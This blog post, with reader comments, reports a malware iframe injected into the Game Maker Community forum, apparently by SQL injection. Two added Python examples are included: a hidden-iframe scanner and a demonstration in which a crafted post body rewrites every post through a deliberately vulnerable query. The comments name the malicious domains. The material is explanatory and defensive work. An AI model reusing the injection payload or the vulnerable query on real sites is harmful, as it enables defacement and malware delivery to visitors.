GMC Malware Attack

It’s not often that there is headline news for GM, but this story is unlikely to go unnoticed.

According to several users of the GMC (which we will not link to, for reasons explained below), malicious code has been embedded in the forum’s page code. The code allegedly creates a hidden iframe that silently loads a malicious website, which in turn tries to download malware onto the visitor’s computer, and it is reported to appear in every forum topic.
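The kind of injected iframe described above is easy to miss in a page full of forum markup, so a useful first response is to scan the stored HTML (a database dump of post bodies or templates) for iframes that point off-site or are sized and styled to be invisible. The following scanner is an added example written for this page, not code from the original post or from the forum software; the allow-listed host, the sample topic HTML and the `attacker.invalid` domain in it are constructed for illustration and are not the domains reported on the page.

```python
"""Scan stored forum HTML for injected, hidden iframes.

Added example, not part of the original post. Sample HTML, the allow-listed
host and the attacker.invalid domain are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the forum is legitimately expected to embed content from (assumption).
ALLOWED_HOSTS = {"gmc.yoyogames.com"}

# CSS that hides a frame: display:none, visibility:hidden, or pushed off-screen.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|"
    r"left\s*:\s*-\d{3,}px|top\s*:\s*-\d{3,}px",
    re.I,
)


def _tiny(value):
    """True for width/height values that make the frame effectively invisible."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", str(value))
    return m is not None and int(m.group(1)) <= 1


class IframeAuditor(HTMLParser):
    """Collects every <iframe> that looks injected: external host or hidden."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        host = urlparse(src).hostname or ""
        reasons = []
        if host and host not in ALLOWED_HOSTS:
            reasons.append("external host %s" % host)
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("zero/one-pixel dimensions")
        if HIDDEN_STYLE.search(a.get("style") or ""):
            reasons.append("hidden via CSS")
        if reasons:
            self.findings.append({"src": src, "reasons": reasons})


def audit_html(html):
    """Return a list of suspicious iframes found in one blob of HTML."""
    parser = IframeAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: one legitimate embed plus one hidden, off-site frame.
SAMPLE_TOPIC = """
<div class="post">Hello from a normal post.</div>
<iframe src="http://gmc.yoyogames.com/embed/poll.php" width="400" height="200"></iframe>
<iframe src="http://attacker.invalid/in.cgi?3" width="0" height="0" style="display:none"></iframe>
"""

if __name__ == "__main__":
    for finding in audit_html(SAMPLE_TOPIC):
        print(finding["src"], "->", ", ".join(finding["reasons"]))
```

Run it over each post body or template row in turn; a frame that is both off-site and hidden is almost certainly injected, while an off-site frame with normal dimensions (an embedded video, say) only needs a human look at the host.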

Until there are further developments on this story, we recommend that you DO NOT visit the GMC.

According to one user, Google Chrome warns users before loading any GMC page that the site contains malicious code and recommends not continuing. Internet Explorer users, on the other hand, seem to be the most affected by the attack (not surprisingly).

According to Phil Gamble on the Game Maker Blog, the forum code may have been altered through what he calls ‘MySQL injection’, i.e. SQL injection against the forum’s database: a hacker finds a vulnerability in the website that lets him or her modify or add content directly in the forum’s database, without needing administrator access to the forum itself.
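To make the mechanism concrete, the following added example (written for this page, not the forum’s own code) builds a tiny post table in SQLite and shows the same edit request handled two ways: a query assembled by string formatting, which lets an ordinary member’s crafted post body rewrite every post in the table, and the parameterised version, which stores the crafted text as data. The schema, function names and the `attacker.invalid` host are constructed for illustration.

```python
"""Vulnerable vs parameterised post editing: how a SQL injection lets an
ordinary member rewrite content they do not own.

Added example, not the forum's code. Schema, function names and the
attacker.invalid host are constructed for illustration.
"""
import sqlite3

# The kind of hidden frame a defacer would want on every page (constructed).
PAYLOAD = '<iframe src="http://attacker.invalid/" width="0" height="0"></iframe>'


def make_forum():
    """In-memory forum with three posts by three different members."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, author_id INTEGER, body TEXT)")
    db.executemany("INSERT INTO posts VALUES (?, ?, ?)", [
        (1, 1, "Admin announcement"),
        (2, 2, "Welcome to the forum"),
        (3, 7, "My first post"),
    ])
    db.commit()
    return db


def edit_post_vulnerable(db, author_id, post_id, body):
    """The member's text is pasted into the SQL, so it can rewrite the statement.

    Returns the SQL actually executed so the effect of the payload is visible.
    """
    sql = "UPDATE posts SET body = '%s' WHERE id = %d AND author_id = %d" % (
        body, post_id, author_id)
    db.execute(sql)
    db.commit()
    return sql


def edit_post_safe(db, author_id, post_id, body):
    """Parameter binding: the body is always a value, never part of the SQL."""
    db.execute("UPDATE posts SET body = ? WHERE id = ? AND author_id = ?",
               (body, post_id, author_id))
    db.commit()


def bodies(db):
    """Post bodies in id order, for inspecting what each variant did."""
    return [row[0] for row in db.execute("SELECT body FROM posts ORDER BY id")]


def demo():
    """Member 7 owns only post 3, but submits a body that closes the string
    literal, replaces the WHERE clause with a tautology and comments out
    the rest of the statement."""
    injected = PAYLOAD + "' WHERE 1=1 -- "

    vuln = make_forum()
    edit_post_vulnerable(vuln, author_id=7, post_id=3, body=injected)

    safe = make_forum()
    edit_post_safe(safe, author_id=7, post_id=3, body=injected)

    return bodies(vuln), bodies(safe)


if __name__ == "__main__":
    vulnerable_result, safe_result = demo()
    print("vulnerable:", vulnerable_result)
    print("safe:      ", safe_result)
```

In the vulnerable run all three posts, including the administrator’s announcement, now carry the iframe, which matches the report above that the code appears in every topic. Note that the parameterised version only keeps the payload out of the SQL; the stored string still contains iframe markup, so escaping or sanitising post bodies at render time remains a separate control.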

KC, a moderator of the GMC, was quick to say users shouldn’t be too worried despite all the virus warning pop-ups users have reported. “yourtraff.biz [the malicious website] has been listed as a malware site before. It’s probably being generated by one of the advertisers on YYG. I wouldn’t worry too much about it.” Nevertheless, we recommend taking all the precautions necessary to ensure your computer’s safety.

Update: Thanks to NakedPaulToast, the security flaw in the forum software that may have allowed this attack appears to have been identified. According to the website, a patch has been available

Update: One user warns that the virus also affects Firefox users, and that his or her anti-virus software reported a detection named “HTML:IFrame-BL [Trj]”.

Update: Screenshots from users:
Google Chrome (from Jangos_Legacy)
Internet Explorer & AVG (from Jangos_Legacy)
Firefox & Google Toolbar (from Revel)

Update: For those who want to keep up to date with what’s happening, the GMC virus topic can be read in the forum’s low-fi mode, which lets you view the topic without putting your computer at risk (at least for now).

Update: Internet Explorer users are reporting that the GMC is now asking to install an ActiveX control called “Microsoft works imaging server” from an unverified publisher (i.e. it is not signed by Microsoft, whatever the name suggests). There is also a report that the website is automatically launching Microsoft Outlook.

Update: The Game Maker Blog has been updated to confirm that the security vulnerability on the GMC still exists and that the iframe is now loading different malicious websites from the ones seen before. So far there have been no signs of major virus damage as a result of visiting the website; however, if the URL keeps changing, it is probably only a matter of time before it forces dangerous executables to run on the end user’s computer.

Update: Mark Overmars is now reading the virus and malware related topics on the GMC forum. As an administrator he has more control over the forum than other users and can choose to close the forum until it is safe for users to come back. It is unknown, however, whether he has the server-side access required to patch the forum software and fix the security vulnerability.

Update: The GMC is reportedly now asking users to download and run various Java applets and ActiveX controls which are damaging to your computer. Most of them claim to be from “Microsoft”, but the source is in fact an unverified/unsigned publisher trying to mask itself under the company’s name.

Update: It appears things are just getting worse. As the day closes (in North America), any attempt to access the GMC in Firefox is blocked with a “Reported Attack Site!” message. Previously, this only happened to users who also had Google’s Firefox toolbar extension installed.

Update: The GMC has now been given the all clear by forum administrator chronic. It is expected to take a couple of days before the Google/Firefox warnings clear.


25 Responses

  1. thanks for posting this…
    note:

    I use IE7 and AVG anti-virus, and it says that it has found a virus. IE7 also pops up some thingy too…

  2. Thanks for the news update. I was about to visit the GMC. I think I’ll keep my distance until it gets cleared up. It is nice to see that FF catches the site. I loved the little “Get me out of here!” on the Firefox one.
    Kind of crazy that a patch had been out for it already. Then again, zero-day attacks don’t happen that often, and I doubt that the GMC would really be considered worth a zero-day attack.

    -Elmernite

  3. @Elmernite, be warned Firefox doesn’t protect you from it. Only if you also happen to have the Google Toolbar installed are you protected.

  4. Well that’s just great… keep us up to date!

  5. Yeah, it asked me to install something…

    and then it asked me to install something else just a moment ago… I declined both… and now, when I told AVG to heal the files, it said it couldn’t find them! Uh oh, I might have a problem. I will have to run a scan…
    I HOPE THEY DON’T CLOSE THE FORUM!!!!!!!!!!

  6. Ok thanks! I’ll just wait till everything is cleared before I go there anyway. Hasn’t this happened in the past?

    -Elmernite

  7. It probably has, but I never remember it being THIS serious. And thanks for the good advice PythonPoole, I did scan and I did find one virus and cleaned it.

    -Caniac

  8. I am using Firefox 3.0.1 and upon visiting the GMC received the same “Reported Attack Site” notice as Revel (I also have Google Toolbar installed– it came with FF 3). However, one of my friends that also uses the GMC uses FF 2 and didn’t receive a warning upon visiting the website (though I don’t know if he has Google Toolbar).

    McAfee SiteAdvisor didn’t report any malicious activity. There’s a Google Diagnostic Test on it, that can be found here: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://gmc.yoyogames.com/index.php .

    According to the Google Diagnostic Test, there are two domains distributing malware to the GMC: traffic-exchange.biz and rivatos.net .

    Not sure this will help (or if anyone already knows about this). Ah well.

    Hopefully the security hole will be fixed soon.

  9. One way to browse the gmc without those iframes would be by using Adblock Plus (a firefox extension) and adding the following values:

    http://rivatos.net*
    augreat.mine.nu/*
    traffic-exchange.biz/*

  10. I went there, I didn’t get my computer harmed, and I am running my anti-virus and starting a quick scan.

  11. You may think this is not serious – but it is! It stopped my AVG from being able to update and only allowed access to some sites. For example, at the moment I am on a computer that I have not visited the GMC with and Google is working; however, on the other two computers that I have visited the site on (IE7 on both, FF 3 on one and Chrome on both) Google and several other sites are not working! Doing a system restore at the moment. AVG says there is a threat but is not finding anything on a scan. This is very bad news. I can’t guarantee that the GMC crash has caused this, but from my findings it could be a definite cause. My advice – stay away from the GMC until further notice; update definitions and do a scan pronto; and keep watching these blog sites for more updates.

    Cheers
    ~Qwertyuiop23

  12. Damn. This really sucks.

    I’m just glad that I was sleeping over the time when this got worse… But I did visit the GMC yesterday quite a few times. Is it possible that my computer could have been affected in any way? Should I run a virus scan (Antivir isn’t up-to-date, nothing really showed any trace of an attack)?

    Should’ve taken that ‘gmc viruses’ topic more seriously.

    Is there some source of information that’s up-to-date 24/7? I haven’t seen any official announcement on this at all. I hope there will be one (Yoyogames ought to do something about this).

  13. It really annoys me that there is nothing told about this virus on the yoyogames blog. I think that’s a big shame.

    You said it has given the all clear.
    So I assume it’s safe now. I don’t want to take a single risk.

  14. Great! Thanks for the update! Nice to know it’s all clear now.
    Now I can resume wasting my time on the GMC. I think I spent my time better when it was down.
    -Elmernite

  15. Is the forum software patched or is just the iframe removed and are we waiting for another iframe to appear?

  16. (BTW it would make sense to post the “clear message” on the Glog since I’m not visiting the GMC before I read that message)

  17. Weird, Firefox is still showing that it is blocking an iframe ( “http://inetppui.com/html/3767/90281401124fd0c93474c063e1cae5b4/ “)

  18. I never gave the GMC “the all clear”, I said I had removed the iframe. Another link to the virus/malware still existed but only just came to my attention. This has now been removed.

  19. It has been officially cleared now.
    So everything should be a go.
    -Elmernite

  20. Nope, it ain’t cleared up any more. See my brand new topic in “the Community”

    http://gmc.yoyogames.com/index.php?showtopic=396697

  21. Officially cleared? Who is this official?

  22. Ah, nvm… the YYG blog.

  23. Woah. That’s freakin’ strange, every time my internet goes down, the GMC is hacked! xD My ISP discontinued our service for some reason, the bill was paid, and when I found a place in the house where I could get internet from my laptop, I saw this topic! xP This has happened in the past too. Strange…

  24. Man, it really sucks how people do this sort of stuff.
